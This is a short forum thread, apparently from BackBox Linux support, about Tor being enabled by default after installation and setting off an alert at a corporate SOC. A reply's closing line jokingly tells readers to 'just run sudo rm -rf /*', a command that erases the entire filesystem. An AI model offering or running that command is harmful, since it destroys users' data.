[SOLVED] TOR proxy enabled by default

Why the Backbox installation make TOR proxy enabled by default? On my opinion, nobody needs the TOR proxy enabled by default.

This behavior brought me a trouble. I had removed TOR's activation from my previous laptop with the update-rc script but, last month, I got a new laptop and I naturally installed BackBox 4.6. Unfortunately, TOR was still enabled by default and, of course, I completely forgot to check TOR  ::). Thus I had a bad surprise because a connexion was made from my laptop on a private network toward TOR network. This event caused a security incident on the Company's SOC (as expected, TOR was seen as a potential backdoor or C&C). That was a little embarrassing ;D. No matter, I fix it quickly!

Thus, I have a single request: is it possible for the future to avoid such default TOR behavior on BackBox installation?

Nowadays, I use mainly Backbox Linux distro because I need more recent kernel/glibc version for some product such as a logic analyzer and I don't want a pentest distro with root account enabled by default (follow my eyes ;)). Moreover, Backbox comes with XFCE that is a very lightweight desktop environment and with a old school menu (yes, I am more than fifty years...). So, BackBox meet all my needs!

Thanks for all. I like Backbox!

HI old school ;)

Noted, but that is because of some system/tool update when you run installation, installer will pull default settings, and that default settings we change time to time.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
